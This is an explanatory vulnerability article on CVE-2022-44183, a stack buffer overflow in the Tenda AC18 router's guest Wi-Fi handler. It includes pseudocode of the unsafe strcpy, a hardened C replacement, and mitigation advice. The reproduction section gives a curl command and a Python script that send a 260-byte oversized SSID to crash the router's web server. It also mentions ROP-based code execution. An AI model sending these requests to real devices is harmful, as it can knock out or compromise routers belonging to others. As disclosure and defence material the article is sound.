In November 2022, a buffer overflow vulnerability in the Tenda AC18 router, firmware version V15.03.05.19, was published as CVE-2022-44183. The flaw sits in the router's web management backend and, as described here, allows an attacker who already holds a valid management session to overflow a stack buffer and execute arbitrary code on the device, potentially taking full control of it. This article walks through CVE-2022-44183, explains why the vulnerable function is unsafe, shows how a triggering request is built, and links to the original advisories.
What is the Tenda AC18?
The Tenda AC18 is a popular dual-band gigabit Wi-Fi router used in homes and small offices worldwide. Like many routers, it offers a web-based management interface for configuring settings like Wi-Fi, guest network, and security.
Overview of CVE-2022-44183
CVE-2022-44183 affects the function formSetWifiGuestBasic, the backend handler for changes to the guest Wi-Fi settings. The bug is that the function copies user-supplied input into a fixed-size stack buffer without checking its length, so an over-long value overwrites whatever lies beyond that buffer: a classic stack-based buffer overflow.
Vulnerable function: formSetWifiGuestBasic
Whenever a user modifies guest Wi-Fi settings via the web interface, the router's httpd dispatches the POST to the C function formSetWifiGuestBasic. Inside this function, request parameters such as wifi_guest_ssid are copied into fixed-size local buffers with unbounded string functions (strcpy and strcat), and nothing compares the input length against the buffer size first.
The following simplified pseudocode, reconstructed from the decompiled handler, illustrates the risky pattern (request_t, response_t and cgiGetParam stand in for the firmware's actual request-handling types and parameter accessor):
void formSetWifiGuestBasic(request_t *req, response_t *res) {
    char wifi_guest_ssid[64];              /* fixed-size buffer on the stack */
    /* Get the 'wifi_guest_ssid' value from the HTTP POST body */
    char *input = cgiGetParam(req, "wifi_guest_ssid");
    /* Unsafe copy: no length check, input may be far longer than 64 bytes */
    strcpy(wifi_guest_ssid, input);
    ...
}
In this code, any wifi_guest_ssid value longer than 63 bytes (64 including the terminating NUL) overflows the buffer. Because the buffer lives on the stack, the excess bytes overwrite adjacent local variables, the saved frame pointer and eventually the saved return address, which is what turns a crash into code execution.
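The following C program is an added example, not code from the article or from the Tenda firmware. It places the unsafe strcpy pattern from the pseudocode above next to a hardened replacement that validates the length before copying and rejects over-long input rather than silently truncating it. The 64-byte buffer size and the wifi_guest_ssid parameter name follow the article; the 32-byte SSID limit is an assumption taken from the 802.11 standard, and handle_set_wifi_guest_basic is a hypothetical stand-in for the real handler so the check can be exercised without a router.

```c
#include <stdio.h>
#include <string.h>

#define GUEST_SSID_BUF 64   /* buffer size from the article's pseudocode */
#define SSID_MAX_LEN   32   /* assumption: 802.11 caps an SSID at 32 octets */

/* Vulnerable pattern, mirroring the decompiled handler.  Never call this
 * with untrusted input: anything over 63 bytes smashes the stack. */
static void copy_ssid_unsafe(const char *input)
{
    char wifi_guest_ssid[GUEST_SSID_BUF];
    strcpy(wifi_guest_ssid, input);       /* no bound check at all */
    (void)wifi_guest_ssid;
}

/* Length scan that stops after max+1 bytes, so a missing NUL in a long
 * input cannot make us read far past the end of the parameter. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n <= max && s[n] != '\0')
        n++;
    return n;                              /* at most max + 1 */
}

/* Hardened copy: returns 0 on success, -1 if the input is rejected.
 * Rejecting (instead of truncating) keeps the stored SSID identical to
 * what the user asked for and makes the failure visible in the UI. */
int set_guest_ssid(const char *input, char *out, size_t outlen)
{
    if (input == NULL || out == NULL || outlen == 0)
        return -1;
    size_t n = bounded_len(input, SSID_MAX_LEN);
    if (n == 0 || n > SSID_MAX_LEN)        /* empty or longer than allowed */
        return -1;
    if (n + 1 > outlen)                    /* would not fit, NUL included */
        return -1;
    memcpy(out, input, n);
    out[n] = '\0';
    return 0;
}

/* Hypothetical handler: what the fixed formSetWifiGuestBasic would do with
 * the wifi_guest_ssid POST parameter.  Returns 0 if accepted, -1 if rejected. */
int handle_set_wifi_guest_basic(const char *wifi_guest_ssid_param)
{
    char wifi_guest_ssid[GUEST_SSID_BUF];
    return set_guest_ssid(wifi_guest_ssid_param, wifi_guest_ssid,
                          sizeof wifi_guest_ssid);
}

/* Builds a constructed payload of `len` 'A' bytes (like the article's
 * "A" * 260) and feeds it to the hardened handler. */
int probe_with_payload(size_t len)
{
    char payload[512];
    if (len >= sizeof payload)
        return -1;
    memset(payload, 'A', len);
    payload[len] = '\0';
    return handle_set_wifi_guest_basic(payload);
}

int main(void)
{
    copy_ssid_unsafe("GuestWiFi");         /* safe only because the input is short */
    printf("normal SSID accepted: %s\n", probe_with_payload(9) == 0 ? "yes" : "no");
    printf("260 x 'A' rejected:  %s\n", probe_with_payload(260) == -1 ? "yes" : "no");
    return 0;
}
```

The key difference is where the length check happens: the hardened version measures the input with a bound before a single byte is written, so the 260-byte payload used later in this article is refused instead of reaching the stack. Whether the real firmware fix truncates or rejects is not documented on this page; rejecting is the safer default for a field with a well-defined maximum.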
Reproduction Steps
1. Obtain a valid session: formSetWifiGuestBasic is reached through the authenticated management interface, so log in to the router's web UI and capture the session cookie for use in the next step.
2. Crafting a Malicious Payload
Prepare an HTTP POST request whose wifi_guest_ssid parameter is far longer than the 64-byte buffer. For demonstration, the value A repeated 260 times is enough to run well past the end of the buffer.
Example payload (using curl; 192.168.0.1 is the Tenda default LAN address, and SESSION_ID=validsessionid is a placeholder for the cookie captured in step 1):
curl -X POST "http://192.168.0.1/goform/formSetWifiGuestBasic" \
  --data "wifi_guest_ssid=$(python3 -c 'print("A"*260, end="")')" \
  --cookie "SESSION_ID=validsessionid"
Or in Python (same placeholders as above; requires the requests package):
import requests

# Router LAN address (192.168.0.1 is the Tenda default) and the vulnerable handler
url = "http://192.168.0.1/goform/formSetWifiGuestBasic"
# Replace with the real session cookie captured after logging in
cookies = {"SESSION_ID": "validsessionid"}
# 260 bytes, well over the 64-byte stack buffer in formSetWifiGuestBasic
data = {
    "wifi_guest_ssid": "A" * 260,
}
# A crash of the router's httpd typically shows up as a connection error here
resp = requests.post(url, cookies=cookies, data=data, timeout=10)
print(resp.status_code)
print(resp.text)
3. What Happens?
If the router is running affected firmware, this request overflows the buffer. With a plain run of A bytes the usual result is a crash of the web server process (a denial of service until it restarts); with a payload crafted to control the saved return address (shellcode or a ROP chain built for the router's CPU and firmware layout), the overflow can be turned into arbitrary code execution and full control of the device.
Original References
- CVE-2022-44183 NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2022-44183
- Exploit Database: Tenda AC18 formSetWifiGuestBasic Buffer Overflow
- GitHub PoC by security researchers
Mitigation
1. Update Firmware: If Tenda releases a patched firmware for the AC18, update immediately; until then, treat any device on V15.03.05.19 as exploitable by anyone who can log in.
2. Limit Admin Access: Restrict web management to the LAN only and never expose it to the WAN. Because the attack needs an authenticated session, a strong, non-default admin password also raises the bar for an attacker.
Conclusion
CVE-2022-44183 is a reminder that home network equipment can contain severe memory-safety bugs that are easy to trigger once an attacker reaches the management interface. If you own a Tenda AC18 router, check your firmware version and update if you are running V15.03.05.19. Keep IoT and network devices updated, and audit which of their interfaces are exposed and to whom.
*For more technical details or for checking if you’re affected, see the official CVE notice and follow Tenda’s firmware/security updates.*
Timeline
Published on: 11/21/2022 18:15:00 UTC
Last modified on: 11/28/2022 13:32:00 UTC